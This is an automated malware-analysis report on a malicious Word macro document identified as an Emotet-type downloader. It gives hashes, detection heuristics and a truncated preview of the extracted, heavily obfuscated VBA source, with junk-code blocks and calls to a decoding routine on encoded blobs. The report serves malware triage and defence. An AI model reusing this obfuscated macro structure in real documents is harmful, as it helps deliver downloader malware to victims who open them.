Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c55bc2af3e81e2e6…

MALICIOUS

Office (OLE)

188.0 KB Created: 2018-03-28 10:41:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 6bb049eb36257462d38683ff269e171e SHA-1: 1274eb2a916c6a713b34bca1d953354230acad49 SHA-256: c55bc2af3e81e2e6719ec71435904239f9a01632e2dd72ea238ebc3e4a9cafb6
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that utilizes CreateObject. Heuristics indicate it's a legacy WordBasic auto-exec marker and an Excel 4.0 macro sheet. ClamAV identifies it as Doc.Malware.Emodldr-10025032-0, suggesting it acts as a downloader for a second-stage payload.

Heuristics 9

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58983 bytes
SHA-256: cef7ed3e7cd7dd15880f3b104a26adb957c8d037d4773e7f39741e5f8f2464a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 18 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "lwOUqUE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "zWJHKDd"
Function btjhYladNwftoG()
On Error Resume Next
Select Case BEmKk
      Case 84877
         ZYwudG = CStr(pshnH + CStr(24138) - nbMwXE * 75465)
      Case 33704
         MprCLD = BtaWE
         BmHAo = Tan(41169 * vmvMaN)
End Select
TFSjAYa = OmVKU("Y3u5d0ADUAMgBhADMANABkADgAZABmADIAYQA3AGUANQBhADUAMAA4ADgANQA0ADEAZQAyAGIANQAyAGMAMwdS", 6, 79)
Select Case aOMnnH
      Case 85265
         FmDDmZ = CStr(uhpjda + CStr(49802) - XQRklZ * 88134)
      Case 59987
         zZsnjm = wSPjUw
         iHOsOW = Tan(87093 * DAZpWV)
End Select
Select Case CACLs
      Case 49490
         ijIdXb = CStr(aWoPbo + CStr(62977) - qJpWwY * 68159)
      Case 65862
         Itarkd = FTCKF
         sGSiZ = Tan(72502 * riJfQK)
End Select
aUllF = OmVKU("dCG6SgAZgBlADUAZQBiADEAZQBiAa%5B", 6, 23)
Select Case WWbPvB
      Case 19288
         iAnqt = CStr(JImVf + CStr(37421) - jETzz * 94632)
      Case 14513
         juaZkw = smPEMX
         RqjrRh = Tan(42577 * Jlrbn)
End Select
Select Case MZczwX
      Case 69299
         Bohiz = CStr(inGUa + CStr(52948) - zzpFkh * 71907)
      Case 95159
         uPknVG = iEUoI
         totkbf = Tan(42677 * IOzOP)
End Select
itRaOOiwCWu = OmVKU("wjQAwADMANgAyADIAMABiADIAYgBjAGYAZABhAGIANQA2AGUAOQAzAGQANgA2ADAAMAAxAGMAMQA0ADEANAA4ADMAMwA1ADEAZABjADMANQAyADcAMABkAGEAMwA4ADUAMAA1ADgAMgBjADAAMAAyADgANQBiol6kNm", 3, 155)
Select Case ntMqw
      Case 42290
         uSuJEX = CStr(cQGnZP + CStr(11077) - MzFFb * 3322)
      Case 72211
         kZFhO = rdpmGz
         zaWHl = Tan(93358 * IMpATm)
End Select
Select Case YWiKh
      Case 53006
         ZNJfO = CStr(ThorCn + CStr(23619) - jFofnU * 31378)
      Case 47129
         OJOwjw = qNcUp
         bVida = Tan(13466 * szGQn)
End Select
ZnoNSUFuYZ = OmVKU("uMAOQA3ADUAFAXFJ", 2, 10)
Select Case RuftHj
      Case 2694
         uWAAk = CStr(hApKsm + CStr(41081) - SBJtJS * 6228)
      Case 32321
         wLrhN = TVknt
         zddqXY = Tan(84455 * vYAWn)
End Select
Select Case tvvmwr
      Case 10867
         pIVAJ = CStr(YDcaf + CStr(95473) - PcjUw * 21774)
      Case 47863
         UuAZS = zuVJM
         ZzuAL = Tan(37054 * zEGhH)
End Select
RkkEYL = OmVKU("6o,MAOQA4AGYAZgA0ADIAYwAzAGIAYgBjADEAMQBhAGQAOAA3ADcAYQBmADgAMABjAGEAYwAQ4DdjO", 4, 69)
Select Case ddTPSz
      Case 61809
         BVOUbq = CStr(ZJHQS + CStr(86275) - QifIfr * 48469)
      Case 18314
         Mtqpi = iDMjYX
         fjkcTa = Tan(89135 * QoqiNk)
End Select
Select Case uZaaR
      Case 317
         lCiwq = CStr(IHiaH + CStr(5137) - ZiOirj * 57405)
      Case 70498
         HRTLJ = LoqqcY
         TGwPk = Tan(54270 * hUwol)
End Select
rXfOcNS = OmVKU("d1jAGYAZgBlADMAMgA4AGIAYQA0ADUAZABhAGUAYwA0ADYANgA4ADkAYwA1ADUAMwBmADQAZgBkADgAYQBlADEAMgAwADcAZQAwADQAZgBkADIAYgA0AGQAYwBmADUANwBjAGIAMQA5AGMAYgBlADkANgAzADAAOABlADNNA40", 3, 163)
Select Case LKsjiW
      Case 67009
         vMdfDS = CStr(pkRZFF + CStr(28987) - mczBh * 36952)
      Case 73763
         iZKfB = GIGpjX
         TkjKGr = Tan(70509 * OftwDG)
End Select
Select Case LzMfUP
      Case 54209
         TTfvdI = CStr(jIIOb + CStr(11571) - lUMSOz * 56981)
      Case 71745
         nRbdp = kJKNN
         Offboz = Tan(88122 * YMdXML)
End Select
zjuSJi = OmVKU("90jgA1ADIAMABlADQAYwA4ADMAOABiADUAMAAwADIANAAyADcA6KnYX", 4, 47)
Select Case TBAfQi
      Case 10623
         dBiNhX = CStr(DNsQXp + CStr(61951) - ZzjIpb * 77539)
      Case 7187
         dKRHK = wAJnCa
         lMEZI = Tan(30349 * woCnLa)
End Select
Select Case SKjFjD
      Case 76071
         mNIUBZ = CStr(GFuZwC + CStr(6520) - dWkHH * 8516)
      Case 86553
         UtGsK = QPudkG
         FHuiwZ = Tan(65938 * FTlPC)
End Select
hJwwU = OmVKU("XVhANwBlAGEAOAA2ADkAOQBkAGEANwAwADkANQBkA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.